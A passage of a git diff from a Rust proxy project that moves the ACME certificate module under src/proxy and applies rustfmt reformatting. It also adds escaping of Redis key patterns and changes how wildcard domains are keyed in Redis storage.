info!( + "Rate limit still active for domain {}: retry after {} ({} remaining). Skipping certificate request.", + config.opts.domain, retry_after, wait_duration + ); return Ok(()); } } else { @@ -1088,11 +1279,16 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { let now = Utc::now(); if now - last_failure_time < rate_limit_cooldown { let remaining = rate_limit_cooldown - (now - last_failure_time); - warn!("Rate limit error detected for domain {} (retry-after time not parseable from: '{}'). Waiting {} before retry. Skipping certificate request.", - config.opts.domain, last_failure_msg, remaining); + warn!( + "Rate limit error detected for domain {} (retry-after time not parseable from: '{}'). Waiting {} before retry. Skipping certificate request.", + config.opts.domain, last_failure_msg, remaining + ); return Ok(()); } else { - debug!("Rate limit cooldown period has passed for domain {}. Proceeding with certificate request.", config.opts.domain); + debug!( + "Rate limit cooldown period has passed for domain {}. Proceeding with certificate request.", + config.opts.domain + ); } } } @@ -1107,19 +1303,28 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { { Ok(order) => order, Err(e) => { - let error_msg = format!("Failed to create new order for domain {}: {}", config.opts.domain, e); + let error_msg = format!( + "Failed to create new order for domain {}: {}", + config.opts.domain, e + ); warn!("{}. Skipping certificate request.", error_msg); // If it's a rate limit error, store it with retry-after time - let is_rate_limit = error_msg.contains("rateLimited") || - error_msg.contains("rate limit") || - error_msg.contains("too many certificates"); + let is_rate_limit = error_msg.contains("rateLimited") + || error_msg.contains("rate limit") + || error_msg.contains("too many certificates"); if is_rate_limit { if let Some(retry_after) = parse_retry_after(&error_msg) { - info!("Rate limit error for domain {}: will retry after {}", config.opts.domain, retry_after); + info!( + "Rate limit error for domain {}: will retry after {}", + config.opts.domain, retry_after + ); } else { - warn!("Rate limit error for domain {} but could not parse retry-after time. Will wait 24 hours before retry.", config.opts.domain); + warn!( + "Rate limit error for domain {} but could not parse retry-after time. Will wait 24 hours before retry.", + config.opts.domain + ); } } @@ -1134,8 +1339,14 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { let initial_state = order.state(); // Handle unexpected order status - if !matches!(initial_state.status, instant_acme::OrderStatus::Pending | instant_acme::OrderStatus::Ready) { - let error_msg = format!("Unexpected order status: {:?} for domain {}", initial_state.status, config.opts.domain); + if !matches!( + initial_state.status, + instant_acme::OrderStatus::Pending | instant_acme::OrderStatus::Ready + ) { + let error_msg = format!( + "Unexpected order status: {:?} for domain {}", + initial_state.status, config.opts.domain + ); warn!("{}. Skipping certificate request.", error_msg); if let Err(record_err) = storage.record_failure(&error_msg).await { warn!("Failed to record failure: {}", record_err); @@ -1145,153 +1356,158 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { // If order is already Ready, skip challenge processing let state = if matches!(initial_state.status, instant_acme::OrderStatus::Ready) { - info!("Order is already in Ready state, skipping challenge processing and proceeding to finalization"); + info!( + "Order is already in Ready state, skipping challenge processing and proceeding to finalization" + ); // Use initial_state as the final state since we're skipping challenge processing initial_state } else { // Order is Pending, proceed with challenge processing - // Pick the desired challenge type and prepare the response. - let mut authorizations = order.authorizations(); - let mut challenges_set = Vec::new(); - - while let Some(result) = authorizations.next().await { - let mut authz = match result { - Ok(authz) => authz, - Err(e) => { - warn!("Failed to get authorization: {}. Skipping this authorization.", e); - continue; - } - }; - let domain = authz.identifier().to_string(); + // Pick the desired challenge type and prepare the response. + let mut authorizations = order.authorizations(); + let mut challenges_set = Vec::new(); - match authz.status { - instant_acme::AuthorizationStatus::Pending => {} - instant_acme::AuthorizationStatus::Valid => continue, - _ => todo!(), - } + while let Some(result) = authorizations.next().await { + let mut authz = match result { + Ok(authz) => authz, + Err(e) => { + warn!( + "Failed to get authorization: {}. Skipping this authorization.", + e + ); + continue; + } + }; + let domain = authz.identifier().to_string(); - let mut challenge = match authz.challenge(challenge_type.clone()) { - Some(c) => c, - None => { - warn!("Domain '{}': No {:?} challenge found, skipping", domain, challenge_type); - continue; + match authz.status { + instant_acme::AuthorizationStatus::Pending => {} + instant_acme::AuthorizationStatus::Valid => continue, + _ => todo!(), } - }; - - let key_auth = challenge.key_authorization().as_str().to_string(); - match challenge_type { - instant_acme::ChallengeType::Http01 => { - // Check if existing challenge is expired and clean it up - let storage = StorageFactory::create_default(config)?; - let challenge_token = challenge.token.to_string(); - if let Ok(Some(_)) = storage.get_challenge_timestamp(&challenge_token).await { - // Challenge exists, check if expired - let max_ttl = config.opts.challenge_max_ttl_seconds.unwrap_or(3600); - if let Ok(true) = storage.is_challenge_expired(&challenge_token, max_ttl).await { - info!("Existing challenge for token {} is expired (TTL: {}s), will be replaced", challenge_token, max_ttl); - } - } - if let Err(e) = cert_init_server(config, &challenge, &key_auth).await { - warn!("Failed to write challenge file for HTTP-01 challenge: {}. Skipping HTTP-01 challenge.", e); + let mut challenge = match authz.challenge(challenge_type.clone()) { + Some(c) => c, + None => { + warn!( + "Domain '{}': No {:?} challenge found, skipping", + domain, challenge_type + ); continue; } - } - instant_acme::ChallengeType::Dns01 => { - // For DNS-01 challenge, the TXT record should be at _acme-challenge.{base_domain} - // For wildcard domains (*.example.com), use the base domain (example.com) - // For non-wildcard domains, use the domain as-is - // Use the is_wildcard flag computed earlier, or check the domain from authorization - let base_domain = if domain.starts_with("*.") { - // Domain from authorization starts with *. - strip it - domain.strip_prefix("*.").unwrap_or(&domain) - } else if is_wildcard { - // is_wildcard is true but domain doesn't start with *. - // This can happen if ACME returns the base domain instead of wildcard - // Use the domain as-is (it's already the base domain) - &domain - } else { - // For non-wildcard, use domain as-is - &domain - }; - let dns_record = format!("_acme-challenge.{}", base_domain); - let dns_value = challenge.key_authorization().dns_value(); - - info!("DNS-01 challenge for domain '{}' (base domain: {}, wildcard: {}):", domain, base_domain, is_wildcard); - info!(" Create DNS TXT record: {} IN TXT {}", dns_record, dns_value); - info!(" This record must be added to your DNS provider before the challenge can be validated."); + }; - // Check if existing DNS challenge is expired and clean it up - let storage = StorageFactory::create_default(config)?; - if let Ok(Some(_)) = storage.get_dns_challenge_timestamp(&domain).await { - // DNS challenge exists, check if expired - let max_ttl = config.opts.challenge_max_ttl_seconds.unwrap_or(3600); - if let Ok(true) = storage.is_dns_challenge_expired(&domain, max_ttl).await { - info!("Existing DNS challenge for domain {} is expired (TTL: {}s), will be replaced", domain, max_ttl); + let key_auth = challenge.key_authorization().as_str().to_string(); + match challenge_type { + instant_acme::ChallengeType::Http01 => { + // Check if existing challenge is expired and clean it up + let storage = StorageFactory::create_default(config)?; + let challenge_token = challenge.token.to_string(); + if let Ok(Some(_)) = storage.get_challenge_timestamp(&challenge_token).await { + // Challenge exists, check if expired + let max_ttl = config.opts.challenge_max_ttl_seconds.unwrap_or(3600); + if let Ok(true) = storage + .is_challenge_expired(&challenge_token, max_ttl) + .await + { + info!( + "Existing challenge for token {} is expired (TTL: {}s), will be replaced", + challenge_token, max_ttl + ); + } } - } - // Save DNS challenge code to storage (Redis or file) - if let Err(e) = storage.write_dns_challenge(&domain, &dns_record, &dns_value).await { - warn!("Failed to save DNS challenge code to storage: {}", e); + if let Err(e) = cert_init_server(config, &challenge, &key_auth).await { + warn!( + "Failed to write challenge file for HTTP-01 challenge: {}. Skipping HTTP-01 challenge.", + e + ); + continue; + } } - - info!("Waiting for DNS record to propagate..."); - - // Automatically check DNS records - let max_attempts = config.opts.dns_lookup_max_attempts.unwrap_or(100); - let delay_seconds = config.opts.dns_lookup_delay_seconds.unwrap_or(10); - let dns_ready = check_dns_txt_record(&dns_record, &dns_value, max_attempts, delay_seconds).await; - - if !dns_ready { - let error_msg = format!("DNS record not found after checking for domain {}. Record: {} IN TXT {}", domain, dns_record, dns_value); - warn!("{}. Please verify the DNS record is set correctly.", error_msg); + instant_acme::ChallengeType::Dns01 => { + // For DNS-01 challenge, the TXT record should be at _acme-challenge.{base_domain} + // For wildcard domains (*.example.com), use the base domain (example.com) + // For non-wildcard domains, use the domain as-is + // Use the is_wildcard flag computed earlier, or check the domain from authorization + let base_domain = if domain.starts_with("*.") { + // Domain from authorization starts with *. - strip it + domain.strip_prefix("*.").unwrap_or(&domain) + } else if is_wildcard { + // is_wildcard is true but domain doesn't start with *. + // This can happen if ACME returns the base domain instead of wildcard + // Use the domain as-is (it's already the base domain) + &domain + } else { + // For non-wildcard, use domain as-is + &domain + }; + let dns_record = format!("_acme-challenge.{}", base_domain); + let dns_value = challenge.key_authorization().dns_value(); + + info!( + "DNS-01 challenge for domain '{}' (base domain: {}, wildcard: {}):", + domain, base_domain, is_wildcard + ); + info!( + " Create DNS TXT record: {} IN TXT {}", + dns_record, dns_value + ); + info!( + " This record must be added to your DNS provider before the challenge can be validated." + ); + + // Check if existing DNS challenge is expired and clean it up let storage = StorageFactory::create_default(config)?; - if let Err(record_err) = storage.record_failure(&error_msg).await { - warn!("Failed to record failure: {}", record_err); + if let Ok(Some(_)) = storage.get_dns_challenge_timestamp(&domain).await { + // DNS challenge exists, check if expired + let max_ttl = config.opts.challenge_max_ttl_seconds.unwrap_or(3600); + if let Ok(true) = storage.is_dns_challenge_expired(&domain, max_ttl).await { + info!( + "Existing DNS challenge for domain {} is expired (TTL: {}s), will be replaced", + domain, max_ttl + ); + } } - return Ok(()); - } - info!("DNS record found! Proceeding with challenge validation..."); - } - instant_acme::ChallengeType::TlsAlpn01 => todo!("TLS-ALPN-01 is not supported"), - _ => { - let error_msg = format!("Unsupported challenge type: {:?}", challenge_type); - warn!("{}", error_msg); - let storage = StorageFactory::create_default(config)?; - if let Err(record_err) = storage.record_failure(&error_msg).await { - warn!("Failed to record failure: {}", record_err); - } - return Ok(()); - } - } - - // Notify ACME server to validate - info!("Domain '{}': Notifying ACME server to validate challenge", domain); - challenge.set_ready().await - .with_context(|| format!("Failed to set challenge ready for domain {}", domain))?; - challenges_set.push(domain); - } + // Save DNS challenge code to storage (Redis or file) + if let Err(e) = storage + .write_dns_challenge(&domain, &dns_record, &dns_value) + .await + { + warn!("Failed to save DNS challenge code to storage: {}", e); + } - if challenges_set.is_empty() { - let error_msg = format!("All domains failed challenge setup for domain {}", config.opts.domain); - warn!("{}", error_msg); - let storage = StorageFactory::create_default(config)?; - if let Err(record_err) = storage.record_failure(&error_msg).await { - warn!("Failed to record failure: {}", record_err); - } - return Ok(()); - } + info!("Waiting for DNS record to propagate..."); + + // Automatically check DNS records + let max_attempts = config.opts.dns_lookup_max_attempts.unwrap_or(100); + let delay_seconds = config.opts.dns_lookup_delay_seconds.unwrap_or(10); + let dns_ready = + check_dns_txt_record(&dns_record, &dns_value, max_attempts, delay_seconds) + .await; + + if !dns_ready { + let error_msg = format!( + "DNS record not found after checking for domain {}. Record: {} IN TXT {}", + domain, dns_record, dns_value + ); + warn!( + "{}. Please verify the DNS record is set correctly.", + error_msg + ); + let storage = StorageFactory::create_default(config)?; + if let Err(record_err) = storage.record_failure(&error_msg).await { + warn!("Failed to record failure: {}", record_err); + } + return Ok(()); + } - // Exponentially back off until the order becomes ready or invalid. - let mut tries = 0u8; - let state = loop { - let state = match order.refresh().await { - Ok(s) => s, - Err(e) => { - if tries >= 10 { - let error_msg = format!("Order refresh failed after {} attempts: {}", tries, e); + info!("DNS record found! Proceeding with challenge validation..."); + } + instant_acme::ChallengeType::TlsAlpn01 => todo!("TLS-ALPN-01 is not supported"), + _ => { + let error_msg = format!("Unsupported challenge type: {:?}", challenge_type); warn!("{}", error_msg); let storage = StorageFactory::create_default(config)?; if let Err(record_err) = storage.record_failure(&error_msg).await { @@ -1299,20 +1515,25 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { } return Ok(()); } - tries += 1; - tokio::time::sleep(std::time::Duration::from_secs(2)).await; - continue; } - }; - info!("Order state: {:#?}", state); - if let OrderStatus::Ready | OrderStatus::Invalid | OrderStatus::Valid = state.status { - break state; + // Notify ACME server to validate + info!( + "Domain '{}': Notifying ACME server to validate challenge", + domain + ); + challenge + .set_ready() + .await + .with_context(|| format!("Failed to set challenge ready for domain {}", domain))?; + challenges_set.push(domain); } - tries += 1; - if tries >= 10 { - let error_msg = format!("Giving up: order is not ready after {} attempts for domain {}", tries, config.opts.domain); + if challenges_set.is_empty() { + let error_msg = format!( + "All domains failed challenge setup for domain {}", + config.opts.domain + ); warn!("{}", error_msg); let storage = StorageFactory::create_default(config)?; if let Err(record_err) = storage.record_failure(&error_msg).await { @@ -1321,48 +1542,98 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { return Ok(()); } - let delay = std::time::Duration::from_secs(2 + tries as u64); - info!("order is not ready, waiting {delay:?}"); - tokio::time::sleep(delay).await; - }; + // Exponentially back off until the order becomes ready or invalid. + let mut tries = 0u8; + let state = loop { + let state = match order.refresh().await { + Ok(s) => s, + Err(e) => { + if tries >= 10 { + let error_msg = + format!("Order refresh failed after {} attempts: {}", tries, e); + warn!("{}", error_msg); + let storage = StorageFactory::create_default(config)?; + if let Err(record_err) = storage.record_failure(&error_msg).await { + warn!("Failed to record failure: {}", record_err); + } + return Ok(()); + } + tries += 1; + tokio::time::sleep(std::time::Duration::from_secs(2)).await; + continue; + } + }; - if state.status == OrderStatus::Invalid { - // Try to get more details about why the order is invalid - let mut error_details = Vec::new(); - if let Some(error) = &state.error { - error_details.push(format!("Order error: {:?}", error)); - } + info!("Order state: {:#?}", state); + if let OrderStatus::Ready | OrderStatus::Invalid | OrderStatus::Valid = state.status { + break state; + } - // Fetch authorization details from ACME server if state is None - for auth in &state.authorizations { - if let Some(auth_state) = &auth.state { - // Check authorization status for more details - match &auth_state.status { - instant_acme::AuthorizationStatus::Invalid => { - error_details.push(format!("Authorization {} is invalid", auth.url)); - } - instant_acme::AuthorizationStatus::Expired => { - error_details.push(format!("Authorization {} expired", auth.url)); - } - instant_acme::AuthorizationStatus::Revoked => { - error_details.push(format!("Authorization {} revoked", auth.url)); - } - _ => {} + tries += 1; + if tries >= 10 { + let error_msg = format!( + "Giving up: order is not ready after {} attempts for domain {}", + tries, config.opts.domain + ); + warn!("{}", error_msg); + let storage = StorageFactory::create_default(config)?; + if let Err(record_err) = storage.record_failure(&error_msg).await { + warn!("Failed to record failure: {}", record_err); } - } else { - // Authorization state is None - this means the authorization details weren't included in the order state - // We can't fetch it again because order.authorizations() was already consumed - // Log the URL so the user can check it manually - warn!("Authorization state is None for {}. This usually means the authorization failed or expired. Check the authorization URL for details.", auth.url); - error_details.push(format!("Authorization {} state unavailable (check URL for details)", auth.url)); + return Ok(()); } - } - let error_msg = if error_details.is_empty() { - format!("Order is invalid but no error details available. Order state: {:#?}", state) - } else { - format!("Order is invalid. Details: {}", error_details.join("; ")) + let delay = std::time::Duration::from_secs(2 + tries as u64); + info!("order is not ready, waiting {delay:?}"); + tokio::time::sleep(delay).await; }; + + if state.status == OrderStatus::Invalid { + // Try to get more details about why the order is invalid + let mut error_details = Vec::new(); + if let Some(error) = &state.error { + error_details.push(format!("Order error: {:?}", error)); + } + + // Fetch authorization details from ACME server if state is None + for auth in &state.authorizations { + if let Some(auth_state) = &auth.state { + // Check authorization status for more details + match &auth_state.status { + instant_acme::AuthorizationStatus::Invalid => { + error_details.push(format!("Authorization {} is invalid", auth.url)); + } + instant_acme::AuthorizationStatus::Expired => { + error_details.push(format!("Authorization {} expired", auth.url)); + } + instant_acme::AuthorizationStatus::Revoked => { + error_details.push(format!("Authorization {} revoked", auth.url)); + } + _ => {} + } + } else { + // Authorization state is None - this means the authorization details weren't included in the order state + // We can't fetch it again because order.authorizations() was already consumed + // Log the URL so the user can check it manually + warn!( + "Authorization state is None for {}. This usually means the authorization failed or expired. Check the authorization URL for details.", + auth.url + ); + error_details.push(format!( + "Authorization {} state unavailable (check URL for details)", + auth.url + )); + } + } + + let error_msg = if error_details.is_empty() { + format!( + "Order is invalid but no error details available. Order state: {:#?}", + state + ) + } else { + format!("Order is invalid. Details: {}", error_details.join("; ")) + }; warn!("{}", error_msg); let storage = StorageFactory::create_default(config)?; if let Err(record_err) = storage.record_failure(&error_msg).await { @@ -1387,7 +1658,9 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { // If the order is ready, we can provision the certificate. // Finalize the order - this will generate a CSR and return the private key PEM. - let private_key_pem = order.finalize().await + let private_key_pem = order + .finalize() + .await .context("Failed to finalize ACME order")?; std::thread::sleep(std::time::Duration::from_secs(1)); @@ -1401,7 +1674,10 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { } Ok(None) => { if tries > 10 { - let error_msg = format!("Giving up: certificate is still not ready after {} attempts", tries); + let error_msg = format!( + "Giving up: certificate is still not ready after {} attempts", + tries + ); let storage = StorageFactory::create_default(config)?; if let Err(record_err) = storage.record_failure(&error_msg).await { warn!("Failed to record failure: {}", record_err); @@ -1423,7 +1699,8 @@ async fn request_cert_internal(config: &Config) -> AtomicServerResult<()> { } }; - write_certs(config, cert_chain_pem, private_key_pem).await + write_certs(config, cert_chain_pem, private_key_pem) + .await .context("Failed to write certificates to storage")?; // Clear any previous failure records since certificate was successfully generated @@ -1480,15 +1757,19 @@ async fn write_certs( } info!("Writing certificate to Redis storage backend..."); - storage.write_certs( - domain_cert_pem.as_bytes(), - chain_pem.as_bytes(), - private_key_pem.as_bytes(), - ).await + storage + .write_certs( + domain_cert_pem.as_bytes(), + chain_pem.as_bytes(), + private_key_pem.as_bytes(), + ) + .await .context("Failed to write certificates to storage backend")?; info!("Certificates written successfully to Redis storage backend"); - storage.write_created_at(chrono::Utc::now()).await + storage + .write_created_at(chrono::Utc::now()) + .await .context("Failed to write created_at timestamp")?; // Save certificates to proxy_certificates path @@ -1498,10 +1779,18 @@ async fn write_certs( &fullchain, &private_key_pem, &proxy_certificates_path, - ).await { - warn!("Failed to save certificate to proxy_certificates path: {}", e); + ) + .await + { + warn!( + "Failed to save certificate to proxy_certificates path: {}", + e + ); } else { - info!("Certificate saved to proxy_certificates path: {}", proxy_certificates_path); + info!( + "Certificate saved to proxy_certificates path: {}", + proxy_certificates_path + ); } } else { warn!("proxy_certificates path not configured, skipping file save"); @@ -1536,7 +1825,12 @@ pub async fn start_http_server(app_config: &AppConfig) -> AtomicServerResult<()> // Even when using Redis storage, challenge files are still written to filesystem for HTTP-01 tokio::fs::create_dir_all(&challenge_static_path) .await - .with_context(|| format!("Failed to create challenge static path directory: {:?}", challenge_static_path))?; + .with_context(|| { + format!( + "Failed to create challenge static path directory: {:?}", + challenge_static_path + ) + })?; let base_https_path = base_static_path.clone(); let app_config_data = web::Data::new(app_config.clone()); @@ -1553,8 +1847,11 @@ pub async fn start_http_server(app_config: &AppConfig) -> AtomicServerResult<()> // URL: /.well-known/acme-challenge/{token} // File: base_path/well-known/acme-challenge/{token} // The Files service maps the URL path to the file system path - actix_files::Files::new("/.well-known/acme-challenge", challenge_static_path.clone()) - .prefer_utf8(true), + actix_files::Files::new( + "/.well-known/acme-challenge", + challenge_static_path.clone(), + ) + .prefer_utf8(true), ) .route( "/cert/expiration", @@ -1565,9 +1862,9 @@ pub async fn start_http_server(app_config: &AppConfig) -> AtomicServerResult<()> web::get().to(check_cert_expiration_handler), ) // Reject all other requests with 404 - .default_service(web::route().to(|| async { - HttpResponse::NotFound().body("Not Found") - })) + .default_service( + web::route().to(|| async { HttpResponse::NotFound().body("Not Found") }), + ) }) .bind(&address) .with_context(|| format!("Failed to bind HTTP server to {}", address))?; @@ -1575,8 +1872,7 @@ pub async fn start_http_server(app_config: &AppConfig) -> AtomicServerResult<()> info!("HTTP server started successfully at {}", address); // Keep the server running indefinitely - server.run().await - .with_context(|| "HTTP server error")?; + server.run().await.with_context(|| "HTTP server error")?; Ok(()) } diff --git a/src/acme/mod.rs b/src/proxy/acme/mod.rs similarity index 65% rename from src/acme/mod.rs rename to src/proxy/acme/mod.rs index 3ae4041..113fae3 100644 --- a/src/acme/mod.rs +++ b/src/proxy/acme/mod.rs @@ -1,19 +1,18 @@ //! ACME certificate management module //! Re-exports from lib.rs for use in main application -mod errors; pub mod config; -mod storage; mod domain_reader; -pub mod upstreams_reader; pub mod embedded; +mod errors; mod lib; +mod storage; +pub mod upstreams_reader; -pub use errors::AtomicServerResult; -pub use config::{Config, ConfigOpts, AppConfig, RetryConfig, RedisSslConfig}; -pub use storage::{Storage, StorageFactory, StorageType}; +pub use config::{AppConfig, Config, ConfigOpts, RedisSslConfig, RetryConfig}; pub use domain_reader::{DomainConfig, DomainReader, DomainReaderFactory}; -pub use upstreams_reader::{UpstreamsDomainReader, UpstreamsAcmeConfig}; -pub use embedded::{EmbeddedAcmeServer, EmbeddedAcmeConfig}; +pub use embedded::{EmbeddedAcmeConfig, EmbeddedAcmeServer}; +pub use errors::AtomicServerResult; pub use lib::*; - +pub use storage::{Storage, StorageFactory, StorageType}; +pub use upstreams_reader::{UpstreamsAcmeConfig, UpstreamsDomainReader}; diff --git a/src/acme/storage/mod.rs b/src/proxy/acme/storage/mod.rs similarity index 81% rename from src/acme/storage/mod.rs rename to src/proxy/acme/storage/mod.rs index b3f92a1..9df3fe4 100644 --- a/src/acme/storage/mod.rs +++ b/src/proxy/acme/storage/mod.rs @@ -54,15 +54,26 @@ pub trait Storage: Send + Sync { async fn write_challenge(&self, token: &str, key_auth: &str) -> Result<()>; /// Write DNS challenge code for ACME DNS-01 challenge - async fn write_dns_challenge(&self, domain: &str, dns_record: &str, dns_value: &str) -> Result<()>; + async fn write_dns_challenge( + &self, + domain: &str, + dns_record: &str, + dns_value: &str, + ) -> Result<()>; /// Get the timestamp when a challenge was created /// Returns None if challenge doesn't exist or has no timestamp - async fn get_challenge_timestamp(&self, token: &str) -> Result>>; + async fn get_challenge_timestamp( + &self, + token: &str, + ) -> Result>>; /// Get the timestamp when a DNS challenge was created /// Returns None if challenge doesn't exist or has no timestamp - async fn get_dns_challenge_timestamp(&self, domain: &str) -> Result>>; + async fn get_dns_challenge_timestamp( + &self, + domain: &str, + ) -> Result>>; /// Check if a challenge is expired based on TTL async fn is_challenge_expired(&self, token: &str, max_ttl_seconds: u64) -> Result; @@ -114,23 +125,29 @@ pub struct StorageFactory; impl StorageFactory { /// Create a storage backend (Redis only) - pub fn create(storage_type: StorageType, config: &crate::acme::Config) -> Result> { + pub fn create( + storage_type: StorageType, + config: &crate::proxy::acme::Config, + ) -> Result> { match storage_type { - StorageType::Redis => { - Ok(Box::new(RedisStorage::new(config)?)) - } + StorageType::Redis => Ok(Box::new(RedisStorage::new(config)?)), } } /// Create storage from AppConfig storage settings (Redis only) - pub fn create_from_app_config(_app_config: &crate::acme::AppConfig, domain_config: &crate::acme::Config) -> Result> { + pub fn create_from_app_config( + _app_config: &crate::proxy::acme::AppConfig, + domain_config: &crate::proxy::acme::Config, + ) -> Result> { Self::create(StorageType::Redis, domain_config) } /// Create storage based on config settings (Redis only) - pub fn create_default(config: &crate::acme::Config) -> Result> { - tracing::debug!("Creating Redis storage backend for domain: {}", config.opts.domain); + pub fn create_default(config: &crate::proxy::acme::Config) -> Result> { + tracing::debug!( + "Creating Redis storage backend for domain: {}", + config.opts.domain + ); Self::create(StorageType::Redis, config) } } - diff --git a/src/acme/storage/redis.rs b/src/proxy/acme/storage/redis.rs similarity index 74% rename from src/acme/storage/redis.rs rename to src/proxy/acme/storage/redis.rs index e687437..a9a5ac1 100644 --- a/src/acme/storage/redis.rs +++ b/src/proxy/acme/storage/redis.rs @@ -1,8 +1,8 @@ //! Redis storage backend implementation -use crate::acme::Config; use super::Storage; -use anyhow::{anyhow, Context, Result}; +use crate::proxy::acme::Config; +use anyhow::{Context, Result, anyhow}; use async_trait::async_trait; use redis::AsyncCommands; use std::path::PathBuf; @@ -22,7 +22,10 @@ impl RedisStorage { /// Create a new Redis storage backend pub fn new(config: &Config) -> Result { // Get Redis URL from config, environment, or use default - let redis_url = config.opts.redis_url.clone() + let redis_url = config + .opts + .redis_url + .clone() .or_else(|| std::env::var("REDIS_URL").ok()) .unwrap_or_else(|| "redis://127.0.0.1:6379".to_string()); @@ -35,20 +38,17 @@ impl RedisStorage { }; // Get Redis prefix from RedisManager if available, otherwise use default - let prefix = crate::redis::RedisManager::get() + let prefix = crate::storage::redis::RedisManager::get() .map(|rm| rm.get_prefix().to_string()) .unwrap_or_else(|_| "ssl-storage".to_string()); - // Normalize domain: strip wildcard prefix (*.) for consistent Redis key naming - // This ensures wildcard certificates (*.example.com) are stored with the same key - // as when they're looked up (example.com) + // Store domain as-is to avoid collisions let domain = config.opts.domain.clone(); - let normalized_domain = domain.strip_prefix("*.").unwrap_or(&domain); - let base_key = format!("{}:{}", prefix, normalized_domain); + let base_key = format!("{}:{}", prefix, domain); // Try to reuse the connection manager from RedisManager for connection pooling // ConnectionManager is Clone and shares the underlying connection pool - let shared_connection = crate::redis::RedisManager::get() + let shared_connection = crate::storage::redis::RedisManager::get() .ok() .map(|rm| rm.get_connection()); @@ -61,7 +61,10 @@ impl RedisStorage { } /// Create Redis client with custom SSL/TLS configuration - fn create_client_with_ssl(redis_url: &str, ssl_config: &crate::acme::config::RedisSslConfig) -> Result { + fn create_client_with_ssl( + redis_url: &str, + ssl_config: &crate::proxy::acme::config::RedisSslConfig, + ) -> Result { use native_tls::{Certificate, Identity, TlsConnector}; // Build TLS connector with custom certificates @@ -78,9 +81,15 @@ impl RedisStorage { } // Load client certificate and key if provided - if let (Some(client_cert_path), Some(client_key_path)) = (&ssl_config.client_cert_path, &ssl_config.client_key_path) { - let client_cert_data = std::fs::read(client_cert_path) - .with_context(|| format!("Failed to read client certificate from {}", client_cert_path))?; + if let (Some(client_cert_path), Some(client_key_path)) = + (&ssl_config.client_cert_path, &ssl_config.client_key_path) + { + let client_cert_data = std::fs::read(client_cert_path).with_context(|| { + format!( + "Failed to read client certificate from {}", + client_cert_path + ) + })?; let client_key_data = std::fs::read(client_key_path) .with_context(|| format!("Failed to read client key from {}", client_key_path))?; @@ -100,7 +109,11 @@ impl RedisStorage { }) .with_context(|| format!("Failed to parse client certificate/key from {} and {}. Supported formats: PKCS#8, PKCS#12, or PEM", client_cert_path, client_key_path))?; tls_builder.identity(identity); - tracing::info!("Loaded client certificate from {} and key from {}", client_cert_path, client_key_path); + tracing::info!( + "Loaded client certificate from {} and key from {}", + client_cert_path, + client_key_path + ); } // Configure certificate verification @@ -110,7 +123,8 @@ impl RedisStorage { tracing::warn!("Redis SSL: Certificate verification disabled (insecure mode)"); } - let _tls_connector = tls_builder.build() + let _tls_connector = tls_builder + .build() .with_context(|| "Failed to build TLS connector")?; // Note: The redis crate with tokio-native-tls-comp uses native-tls internally, @@ -160,7 +174,6 @@ impl RedisStorage { format!("{}:live:{}", self.base_key, file_type) } - /// Get metadata key fn metadata_key(&self, key: &str) -> String { format!("{}:metadata:{}", self.base_key, key) @@ -192,8 +205,8 @@ impl RedisStorage { let result: Option<()> = redis::cmd("SET") .arg(&lock_key) .arg("locked") - .arg("NX") // Only set if key doesn't exist - .arg("EX") // Set expiration + .arg("NX") // Only set if key doesn't exist + .arg("EX") // Set expiration .arg(ttl_seconds) .query_async(&mut conn) .await @@ -206,7 +219,8 @@ impl RedisStorage { pub async fn release_lock(&self) -> Result<()> { let mut conn = self.get_conn().await?; let lock_key = self.lock_key(); - conn.del::<_, ()>(&lock_key).await + conn.del::<_, ()>(&lock_key) + .await .with_context(|| format!("Failed to release lock for key: {}", lock_key))?; Ok(()) } @@ -220,7 +234,9 @@ impl RedisStorage { T: Default, { if !self.acquire_lock(ttl_seconds).await? { - tracing::warn!("Failed to acquire lock for domain - another instance is processing this domain. Skipping operation."); + tracing::warn!( + "Failed to acquire lock for domain - another instance is processing this domain. Skipping operation." + ); return Ok(Default::default()); } @@ -237,13 +253,16 @@ impl RedisStorage { /// Delete all archived certificates (Redis doesn't need to keep old versions) async fn delete_archived_certs(&self, conn: &mut redis::aio::ConnectionManager) -> Result<()> { // Get all keys matching the archive pattern - let archive_pattern = format!("{}:archive:*", self.base_key); - let keys: Vec = conn.keys(&archive_pattern).await + let archive_pattern = format!("{}:archive:*", escape_redis_pattern(&self.base_key)); + let keys: Vec = conn + .keys(&archive_pattern) + .await .with_context(|| format!("Failed to get archive keys matching {}", archive_pattern))?; // Delete all archived keys if !keys.is_empty() { - conn.del::<_, ()>(keys).await + conn.del::<_, ()>(keys) + .await .with_context(|| "Failed to delete archived certificates")?; } @@ -251,12 +270,22 @@ impl RedisStorage { } } +fn escape_redis_pattern(value: &str) -> String { + value + .replace('\\', "\\\\") + .replace('*', "\\*") + .replace('?', "\\?") + .replace('[', "\\[") +} + #[async_trait] impl Storage for RedisStorage { async fn read_cert(&self) -> Result> { let mut conn = self.get_conn().await?; let key = self.live_key("cert"); - let data: Vec = conn.get(&key).await + let data: Vec = conn + .get(&key) + .await .with_context(|| format!("Failed to read certificate from Redis key: {}", key))?; Ok(data) } @@ -264,7 +293,9 @@ impl Storage for RedisStorage { async fn read_chain(&self) -> Result> { let mut conn = self.get_conn().await?; let key = self.live_key("chain"); - let data: Vec = conn.get(&key).await + let data: Vec = conn + .get(&key) + .await .with_context(|| format!("Failed to read chain from Redis key: {}", key))?; Ok(data) } @@ -272,7 +303,9 @@ impl Storage for RedisStorage { async fn read_fullchain(&self) -> Result> { let mut conn = self.get_conn().await?; let key = self.live_key("fullchain"); - let data: Vec = conn.get(&key).await + let data: Vec = conn + .get(&key) + .await .with_context(|| format!("Failed to read fullchain from Redis key: {}", key))?; Ok(data) } @@ -280,25 +313,33 @@ impl Storage for RedisStorage { async fn read_key(&self) -> Result> { let mut conn = self.get_conn().await?; let key = self.live_key("privkey"); - let data: Vec = conn.get(&key).await + let data: Vec = conn + .get(&key) + .await .with_context(|| format!("Failed to read private key from Redis key: {}", key))?; Ok(data) } async fn write_certs(&self, cert: &[u8], chain: &[u8], key: &[u8]) -> Result<()> { tracing::debug!("Connecting to Redis for certificate storage..."); - let mut conn = self.get_conn().await + let mut conn = 